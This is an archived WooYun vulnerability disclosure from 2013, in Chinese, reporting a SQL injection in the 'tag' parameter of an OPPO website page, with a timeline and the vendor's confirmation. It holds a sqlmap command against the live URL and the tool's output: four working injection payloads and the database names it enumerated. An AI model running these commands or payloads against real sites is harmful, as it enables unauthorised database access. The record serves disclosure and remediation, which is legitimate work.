乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-11-06: 细节已通知厂商并且等待厂商处理中 2013-11-08: 厂商已经确认,细节仅向厂商公开 2013-11-18: 细节向核心白帽子及相关领域专家公开 2013-11-28: 细节向普通白帽子公开 2013-12-08: 细节向实习白帽子公开 2013-12-21: 细节向公众公开
0.0
http://www.oppo.com/?q=interface/getfaq&tag=%25E7%2594%25B5%25E6%25BA%2590%25E7%25B1%25BBtag参数未过滤,导致sql注入!
tag参数未过滤,导致sql注入!python sqlmap.py -u "http://www.oppo.com/?q=interface/getfaq&tag=%25E7%2594%25B5%25E6%25BA%2590%25E7%25B1%25BB" --batch --dbssqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: tag Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: q=interface/getfaq&tag=%E7%94%B5%E6%BA%90%E7%B1%BB' AND 6328=6328 AND 'WCJo'='WCJo Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: q=interface/getfaq&tag=%E7%94%B5%E6%BA%90%E7%B1%BB' AND (SELECT 6895 FROM(SELECT COUNT(*),CONCAT(0x7169717a71,(SELECT (CASE WHEN (6895=6895) THEN 1 ELSE 0 END)),0x716d6b6571,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'UBWQ'='UBWQ Type: UNION query Title: MySQL UNION query (NULL) - 15 columns Payload: q=interface/getfaq&tag=%E7%94%B5%E6%BA%90%E7%B1%BB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7169717a71,0x424b7269755743637557,0x716d6b6571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: q=interface/getfaq&tag=-7577' OR 8125=SLEEP(5) AND 'YjZb'='YjZb---back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] oppo_www
过滤
危害等级:低
漏洞Rank:3
确认时间:2013-11-08 15:04
非常感谢关注我司站点,工程师已紧急处理中!!!
暂无
